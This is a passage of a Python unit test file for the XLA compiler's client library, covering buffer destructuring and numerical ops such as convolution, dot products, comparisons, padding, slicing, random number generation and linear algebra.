local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 0)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.LocalBuffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertTrue(local_buffer.is_deleted())
self.assertEqual(len(pieces), 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertEqual(len(got), 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.LocalBuffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2,))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
  single XLA ops. As few additional ops as possible are added around the op
  being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
c.Concatenate(
(c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0]))),
dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.xla_data_pb2.PRED,
np.int32: xla_client.xla_data_pb2.S32,
np.int64: xla_client.xla_data_pb2.S64,
np.float32: xla_client.xla_data_pb2.F32,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.xla_data_pb2.S32,
np.float32: xla_client.xla_data_pb2.F32,
}
xla_x64_types = {
np.int64: xla_client.xla_data_pb2.S64,
np.float64: xla_client.xla_data_pb2.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = c.Build().Compile().ExecuteWithPythonValues()
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486): re-enable when shape check is resolved
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.xla_data_pb2.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs))
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[1, 1], xla_client.PaddingType.SAME)
result = np.array([[[[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(c.Constant(lhs), c.Constant(rhs),
[2, 1], xla_client.PaddingType.VALID)
result = np.array([[[[640., 700., 760.],
[1120., 1180., 1240.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(c.Constant(np.transpose(lhs, (0, 2, 3, 1))),
c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]],
[[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when bug S32 resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().ExecuteWithPythonValues()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(c.Constant(a_vals), c.Constant(b_vals), left_side=False,
lower=True, transpose_a=True)
self._ExecuteAndCompareClose(c, expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
], dtype=np.float32), rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.xla_data_pb2.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
